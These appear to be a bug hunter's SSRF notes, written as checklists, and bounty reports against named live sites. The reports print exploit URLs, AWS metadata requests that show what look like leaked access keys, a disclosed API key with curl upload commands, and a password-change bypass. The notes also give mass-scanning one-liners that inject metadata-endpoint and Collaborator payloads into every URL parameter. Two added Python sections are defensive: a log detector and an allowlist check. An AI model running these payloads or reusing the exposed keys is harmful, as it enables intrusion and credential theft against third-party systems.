
9thADV-SSRF1


SSRF

IMP
1. An HTTP request is what matters
2. Even if an HTTP request arrives, check the source IP address
3. A DNS interaction alone is of no use
4. Exploit it, then report

PORT SCAN
BACKEND SCAN
DOS
FETCH METADATA
FILE OVER PORT SCAN

GET / POST

client.com/user/system?file=https://localhost/adi.xml

client.com/user/system?url=https://evil.com/adi.xml
client.com/user/system?url=https://127.0.0.1/adi.xml

Mistakes

Register form : name@burp.net (an interaction from here is not proof of SSRF)

Check the interacting IP : if it is your OWN, it is NO SSRF

Where SSRF ?

1. Add link
2. Enter URL
3. Insert bio
4. Verify Link
5. Upload document

Rare: Headers

TOOLS:
Burp Collaborator
Intruder
Repeater
Ext : Collaborator Everywhere

Headers :

From: root@q1s8668z0onpmv1fx3ldythr0i69x1lq.burpcollaborator.net
Client-IP: spoofed.75apancg45r6qc5w1kpu2al84zaq1jp8.burpcollaborator.net
CF-Connecting_IP: spoofed.ho9ztxvqnfag9mo6ku84lk4in9t0ku8j.burpcollaborator.net
X-Wap-Profile: http://z77hcfe86xtys47o3crm42n06rci3dr2.burpcollaborator.net/wap.xml
X-Real-IP: spoofed.ua8cfah39swtvzaj67uh7xqv9mfd69uy.burpcollaborator.net
X-Client-IP: spoofed.hcxzhxjqbfygxmc68uw49ksib9h08xwm.burpcollaborator.net
X-Forwarded-For: spoofed.roj9t7v0npaq9wogk48elu4snjtak98y.burpcollaborator.net
X-Originating-IP: spoofed.bm1trrtkl98a7gm0io6yje2cl3ruiv6k.burpcollaborator.net
Forwarded: for=spoofed.ome6r4txlm8n7tmdi16bjr2plgr7i96y.burpcollaborator.net;by=spoofed.ome6r4txlm8n7tmdi16bjr2plgr7i96y.burpcollaborator.net;host=spoofed.ome6r4txlm8n7tmdi16bjr2plgr7i96y.burpcollaborator.net
Contact: root@wyye3c55xukvj1ylu9ijvzexxo3fuii7.burpcollaborator.net
True-Client-IP: spoofed.uhfcmao3gs3t2zhjd71hexxvgmmddh16.burpcollaborator.net

1. Check the URL function
2. Burp.net (Collaborator)
3. Confirm an HTTP request
4. Whois the requesting IP

1. Cross port scan

Signals: HTTP request vs. time delay

HTTP request : OPEN
DNS only : Filtered / Closed
No request : Closed

Port   Observation
80     HTTP request -> OPEN
443    DNS only -> Filtered / Closed
5901   No request + time delay
22     No request + time delay

2. DOS

1. Identify a port that causes a time delay
2. Send the request to Intruder
3. Repeat it many times
4. Look for 502 / 503 responses

3. Backend system scan

Sweep the internal range (netmask 255.255.255.0, i.e. a /24) over HTTP, one IP at a time.
Example result: 4 hosts are alive (me + mum, dad, sis in the original mnemonic).

Per-host port results:
80     Open
22     Closed
8443   Open
443    Open
8080   Filtered
10000, 3306, 25, 21 : no result recorded

site.com/user/profile?img=z.site.com.x64csz8rc1wlfdpywc9ychbpegk68v.burpcollaborator.net/adi.png
https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://o.quizlet.com.x64csz8rc1wlfdpywc9ychbpegk68v.burpcollaborator.net/QwyVU9wD0JGv9II29DyjUg.jpg

Bypass characters : # @ .

http://[::]:8080/jp2/14933009023351.jp2

Workflow: subs -> wayback -> grep cdn -> look for img parameters -> bypass with @ # .

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://farm1.staticflickr.com@615pcsnienat67065o6uulidm4swgl.burpcollaborator.net/175/455279239_720dfc98c8.jpg

Parameter names to grep for:
proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Hi ipsy team,

Aditya here, I found critical security issues in one of your subdomains. Please
look into it.

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads to the
GET-based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:


1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080, 22, 21, 25, 80 and see the response

[screenshots: image.png, image.png]

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:

https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Expiration" : "2022-01-29T15:02:44Z"
}

Hello knaw team,

I, Aditya, found a security issue in your system where SSRF is leading to a port scan.

Title: Internal SSRF to scan ports and force to make HTTP request

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads to the
GET-based URL gives information.

Steps:
1. Open URL https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:8080/jp2/14759615811661.jp2
On port 8080 it is giving an instant response
2. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:80/jp2/14759615811661.jp2
It is giving a slow response or taking time to respond
3. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?rft_id=http://localhost:8080/jp2/14759615811661.jp2
Changed localhost to 127.0.0.1, 0.0.0.0, [::]
4. Capture the URL in Burp Suite > Send to Intruder
5. Add the port "8080" as the attack position
6. Go to Payloads > Numbers > from 1 to 10000, step 1 > Start attack
7. Observe the responses: port 8080 gives 200 OK and the remaining give 404 etc.

Impact:
As an attacker I am able to perform a port scan internally; localhost payloads are
working (blacklist payload). Able to induce the server to make HTTP requests on
different ports like 8080, 443, 80 (DNS)
POC:

[screenshot: image.png]

502
503
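The two reports above describe what the image proxy was induced to fetch: many localhost ports in sequence, and the AWS metadata address. As an added example (not from these notes or reports), here is detection logic a defender could run over such a proxy's access log to flag that behaviour: one client driving the proxy at several ports on an internal host, or at 169.254.169.254 at all. The log lines, client IPs and the threshold are constructed; the path shape follows the ipsy endpoint quoted in the report.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed access-log sample: one scanning client, one legitimate client.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2022:08:50:01 +0000] "GET /720,fit,q85/http://localhost:8080 HTTP/1.1" 200 4311
203.0.113.7 - - [29/Jan/2022:08:50:02 +0000] "GET /720,fit,q85/http://localhost:22 HTTP/1.1" 502 0
203.0.113.7 - - [29/Jan/2022:08:50:03 +0000] "GET /720,fit,q85/http://localhost:21 HTTP/1.1" 504 0
203.0.113.7 - - [29/Jan/2022:08:50:04 +0000] "GET /720,fit,q85/http://127.0.0.1:25 HTTP/1.1" 504 0
203.0.113.7 - - [29/Jan/2022:08:50:09 +0000] "GET /300,fit,q1/http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 1729
198.51.100.4 - - [29/Jan/2022:08:51:00 +0000] "GET /720,fit,q85/https://cdn.example.invalid/a.jpg HTTP/1.1" 200 8812
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
EMBEDDED_URL_RE = re.compile(r"https?://\S+")  # the upstream URL the proxy was asked to fetch
IMDS = "169.254.169.254"

def is_internal(host: str) -> bool:
    """True for names or literals that should never be an image source."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for this log check
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def analyse(log_text: str, port_threshold: int = 3) -> dict[str, dict]:
    """Per-client findings: distinct internal ports touched and metadata-endpoint hits."""
    internal_ports = defaultdict(set)
    imds_hits = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        u = EMBEDDED_URL_RE.search(m["path"])
        if not u:
            continue  # no upstream URL in the path: an ordinary request
        parts = urlsplit(u.group(0))
        host = parts.hostname or ""
        port = parts.port or (443 if parts.scheme == "https" else 80)
        if host == IMDS:
            imds_hits[m["client"]] += 1
        if is_internal(host):
            internal_ports[m["client"]].add(port)
    findings = {}
    for client in set(internal_ports) | set(imds_hits):
        ports = sorted(internal_ports[client])
        # Alert on a spread of internal ports (scan) or on any metadata access at all.
        if len(ports) >= port_threshold or imds_hits[client]:
            findings[client] = {"scan_ports": ports, "imds_hits": imds_hits[client]}
    return findings
```

Requiring IMDSv2 (a session token obtained with a PUT request) stops a GET-only image fetcher from reaching the credentials path even while the SSRF itself remains unfixed.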

Hello team,

I, Aditya Shende, found a Blind SSRF whitelist bypass in one of your subdomains. Please
look into it.

Aditya here, found a Blind SSRF whitelist bypass.

What is blind SSRF?


Blind SSRF vulnerabilities arise when an application can be induced to issue a
back-end HTTP request to a supplied URL, but the response from the back-end request
is not returned in the application's front-end response.

What is the impact of blind SSRF vulnerabilities?


The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF
vulnerabilities because of their one-way nature. They cannot be trivially exploited
to retrieve sensitive data from back-end systems, although in some situations they
can be exploited to achieve full remote code execution.

Steps:
1. Open URL:
https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/rotate=deg:exif/resize=height:1400/output=quality:70/compress/https://cdn.fs.grailed.com/api/file/AKXqF3qXSX2Fa1ih5O7X
2. After the CDN domain enter the Collaborator link to check the response
3. Final URL:
https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/rotate=deg:exif/resize=height:1400/output=quality:70/compress/https://cdn.fs.grailed.com@cgwhcsjw1tmkmnmnq01z1vh9q0wqkf.burpcollaborator.net/api/file/AKXqF3qXSX2Fa1ih5O7X

POC attached

SSRF
AWS SSRF detection
Whitelist bypass
Report Writing
BAC

csrf token
boomr key
bugsnag key

site.com/index.php?id=169.254.169.254/abc.xml

APIPA (link-local) range : 169.254.0.1 to 169.254.255.254
AWS metadata endpoint : 169.254.169.254/latest

Payloads:

http://169.254.169.254/latest

Tip : Grep this

proxy
page
forward
proxy_url
width
cdn
cdn-cgi

cat domains.txt | waybackurls | grep keyword

=======================================================================================================

Whitelist SSRF

1. The site fetches from another (whitelisted) site

cdn-cgi

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/https://o.quizlet.com/BxagYHADfejrpW8u9Dts2Q.jpg

Bypass characters : @ . #
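The @ . # tricks in this section, the quizlet/flickr/grailed payloads earlier in the notes, and the localhost / [::] / 169.254.169.254 targets from the reports all defeat a check that only looks for the allowed host name somewhere in the URL string. As an added example (not code from these notes or from any of the sites named), the substring check is shown beside a hardened one that parses the URL and judges the effective host; ALLOWED_HOSTS and the '#' payload are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

# Hosts the image proxy is meant to fetch from (constructed allowlist).
ALLOWED_HOSTS = {"o.quizlet.com", "farm1.staticflickr.com", "cdn.fs.grailed.com"}

def naive_allowed(url: str) -> bool:
    """Vulnerable: passes any URL that merely *contains* an allowed host name."""
    return any(host in url for host in ALLOWED_HOSTS)

def hardened_check(url: str) -> tuple[bool, str]:
    """Parse the URL and judge only the host the fetcher would actually connect to."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # userinfo ('cdn...@'), port and IPv6 brackets are stripped here
    if not host:
        return False, "no host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name rather than an IP literal
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local
                           or ip.is_unspecified or ip.is_reserved or ip.is_multicast):
        return False, f"{host} is an internal address"
    if host.lower() not in ALLOWED_HOSTS:  # exact match only: no suffix or substring trust
        return False, f"{host} not in allowlist"
    return True, "ok"

# Constructed inputs: the bypass shapes from the notes plus one clean URL.
PAYLOADS = {
    "dot":   "https://o.quizlet.com.x64csz8rc1wlfdpywc9ychbpegk68v.burpcollaborator.net/a.jpg",
    "at":    "https://cdn.fs.grailed.com@cgwhcsjw1tmkmnmnq01z1vh9q0wqkf.burpcollaborator.net/api/file/x",
    "hash":  "https://attacker.invalid/#o.quizlet.com",
    "local": "http://localhost:8080/jp2/14759615811661.jp2",
    "v6any": "http://[::]:8080/jp2/14933009023351.jp2",
    "imds":  "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "clean": "https://o.quizlet.com/BxagYHADfejrpW8u9Dts2Q.jpg",
}

def compare() -> dict[str, tuple[bool, bool]]:
    """Payload name -> (naive verdict, hardened verdict)."""
    return {name: (naive_allowed(u), hardened_check(u)[0]) for name, u in PAYLOADS.items()}

if __name__ == "__main__":
    for name, (naive, hard) in compare().items():
        print(f"{name:6} naive={naive!s:5} hardened={hard}")
```

The hardened check validates only the literal host: the fetcher must still resolve the name and re-check the resulting IP before connecting, and re-validate every redirect target, otherwise DNS answers and open redirects bring the internal addresses back.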

{
"message": "Password changed"
}

Function: Update password using old password

Title: Able to update password using wrong password or blank password

Description:

The function is to change the password, which requires the original password, but using a
valid JSON response an attacker can still change the password using a random string. When
setting a new password for a user, the product does not require knowledge of the original
password, or using another form of authentication. This could be used by an
attacker to change passwords for another user, thus gaining the privileges
associated with that user.

Steps:

1. Login https://my.sirv.com
2. Navigate to https://my.sirv.com/#/account/settings/personal
3. Perform password change and capture all activity in burpsuite (Include request &
response)
4. While change password enter random string and check response
5. Change status code to 200 OK
6. Response body
{
"message": "Password has been chnaged"
}
7. Forward request
POST request
POST /api/user/password/change HTTP/1.1
Host: my.sirv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://my.sirv.com/
Content-Type: application/json
X-XSRF-TOKEN: Fb4dLVfU-bmQEPee_msubNyVlXeZNBCfFHRs
Content-Length: 51
Origin: https://my.sirv.com
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"password":"AAA","newPassword":"AAAAAAAAAAAAAAAA"}

Response:

HTTP/1.1 403 Forbidden
Date: Sun, 16 Oct 2022 10:28:53 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Set-Cookie: XSRF-TOKEN=HHk2D8Gg-v3pIHnhk_kb1gXrkkOEs85hs7LQ; Path=/
Cache-Control: no-cache
Pragma: no-cache
ETag: W/"48-E/6WXecTPHFbJfs25zBaDg"
Server: Sirv.UI
X-Sirv-Server: c1-fireball-7
X-Frame-Options: SAMEORIGIN
Content-Length: 72
{
"name": "ApiForbiddenError",
"message": "Password is incorrect."
}

Impact:

1. Insecure design mechanism represents weak auth
2. Any unauth actor can abuse this bug to update third-party actor creds
3. Session is not expiring and is validating over status code and response body
4. Must include encrypted tokens or values in the response


I, Aditya Shende, found a critical vulnerability; I hope you remember me ;).

Title: API config endpoint disclosed sensitive key which leads to unauthorised file
upload in grailed domain.

Description:
"APIs tend to expose endpoints that handle object identifiers, creating a wide
attack surface Level Access Control issue. Object-level authorization checks should
be considered in every function that accesses a data source using an input from the
user." - OWASP*
Since APIs enable access to objects, if authorization is broken there is a wide
attack area. Thus, authorization to API-accessible objects must be secured.

Solution: Use an API gateway and implement object-level authorization checks.


Require access tokens to permit access, and only allow access to those with the
proper authorization credentials.
Steps:
1. Visit grailed.com/api/config
2. Search for : "key" and "url" keyword (remove quotes)

Info found:
"filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

https://process.fs.grailed.com

Exploit:
curl -X POST \
  -d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg" \
  "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

In this I fetched a file from another website to upload.

Using this any attacker or bad person can upload a file into your website, which may
lead to impersonating profiles or reputation issues.
There are multiple attacks we can perform using keys but I chose file upload and
this bug is really CRITICAL so patch it ASAP

POC attached ;

Hello team,

Using this I can also perform B-SSRF where I have to insert my server URL :
Exploit:
curl -X POST \
-d url="https://myserver.net/any.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

Also I can upload a heavy image, which is called a pixel flood attack

Reference : https://hackerone.com/reports/390

Hello team,

I escalated this issue to an EXIF metadata vulnerability.

Title : File upload vulnerable for exif metadata disclosure

Summary:
When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation
Data does not get stripped. As a result, anyone can get sensitive information of
example.com users like their Geolocation, their Device information like Device
Name, Version, Software & Software version used etc.

Exploit:

curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

Steps:
1. When the file is uploaded go to http://exif.regex.info/exif.cgi
2. Copy path : https://cdn.fs.grailed.com/nr71rkw1QdmC105JyQ2B
3. Click on view image metadata

Reference :
https://kathan19.gitbook.io/howtohunt/exif-geo-data-not-stripped/exif_geo

EXPLOIT

POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 105
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT [token omitted]
Referer: https://app.short.io/
Connection: close

{"originalURL":"http://54.224.33.106","domain":"5jlw.short.gy","source":"website","allowDuplicates":true}

SSRF automation

subfinder -d target.com | httpx | tee subs.txt
cat subs.txt | waybackurls | tee data.txt
cat data.txt | gf ssrf | tee ssrf.txt

cat data.txt | grep "=" | qsreplace "hj4w5jlbpl95sx2i9wmip1o9r0xrlg.burpcollaborator.net" | tee ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ

https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/cache/u003dexpiry:max/rotate/u003ddeg:exif/resize/u003dheight:700,fit:scale/output/u003dformat:webp,quality:90/compress/https://cdn.fs.grailed.com/api/file/s9KfeMqTUyGnmrlO2ugz

cat data.txt | grep "=" | qsreplace "http://169.254.169.254/latest" | tee ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
cat data.txt | grep "=" | qsreplace "https://169.254.169.254/latest" | tee ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
cat data.txt | grep "=" | qsreplace "169.254.169.254/latest" | tee ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ

echo 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud | waybackurls | grep "=" | qsreplace "http://169.254.169.254/latest"

proxy=
page=
img=
red=
url=

APIPA: 169.254.169.254

payload:

http://169.254.169.254/latest
https://169.254.169.254/latest
169.254.169.254/latest

1. Detection
2. Exploit
3. Automate

cat data.txt | gf ssrf
